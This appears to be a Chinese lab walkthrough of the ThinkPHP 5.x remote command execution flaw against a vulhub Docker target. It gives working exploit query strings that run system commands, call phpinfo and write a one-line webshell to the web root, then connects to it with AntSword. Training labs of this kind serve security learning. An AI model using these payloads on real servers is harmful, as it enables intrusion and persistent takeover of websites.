Thinkphp5x远程命令执行 靶场攻略

2407-2 shw2024-09-24 17:30

环境配置

云服务器:47.113.231.0:8080
靶场:vulhub/thinkphp/5-rce
docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://47.113.231.0:8080/

2.远程命令执⾏

POC:
?
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=whoami ![](https://i-blog.csdnimg.cn/direct/04a49df66abb463c9c0543bf4c310e36.png) ### 3.远程代码执行 POC: ? s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 ![](https://i-blog.csdnimg.cn/direct/a6eeab97a027466d910a1e84e0b1d2a9.png) ### 4.写入一句话木马到根目录下的shw.php POC: ?s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=echo "\" \> shw.php ### 5.蚁剑连接 ![](https://i-blog.csdnimg.cn/direct/d247f62ffdf7449bafe4d66c51704031.png)

相关推荐
Q_Q5110082855 小时前
python+uniapp基于微信小程序团购系统
spring boot·python·微信小程序·django·uni-app·node.js·php
catchadmin13 小时前
PHP8.5 的新 URI 扩展
开发语言·后端·php
G佳伟15 小时前
yii2添加新的modules完为什么访问的时候报错404
php
亿坊电商1 天前
在PHP框架里如何进行数据库连接?
数据库·oracle·php
Q_Q5110082851 天前
python基于web的汽车班车车票管理系统/火车票预订系统/高铁预定系统 可在线选座
spring boot·python·django·flask·node.js·汽车·php
WordPress学习笔记1 天前
安装WordPress时没生成wp-config.php的解决方法
php·wp-config
浪裡遊1 天前
Nivo图表库全面指南:配置与用法详解
前端·javascript·react.js·node.js·php
notillusion1 天前
KWW#71843
java·php·程序优化
notillusion1 天前
TRX#22597
java·php·程序优化
、花无将1 天前
PHP:下载、安装、配置,与apache搭建
android·php·apache
热门推荐
01GitHub 镜像站点02BongoCat - 跨平台键盘猫动画工具03UV安装并设置国内源04Linux下V2Ray安装配置指南05GitLab 零基础入门指南:从安装到项目管理全流程06两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答072025软件测试面试八股文(含答案+文档)08NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南09KGG转MP3工具|非KGM文件|解密音频10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)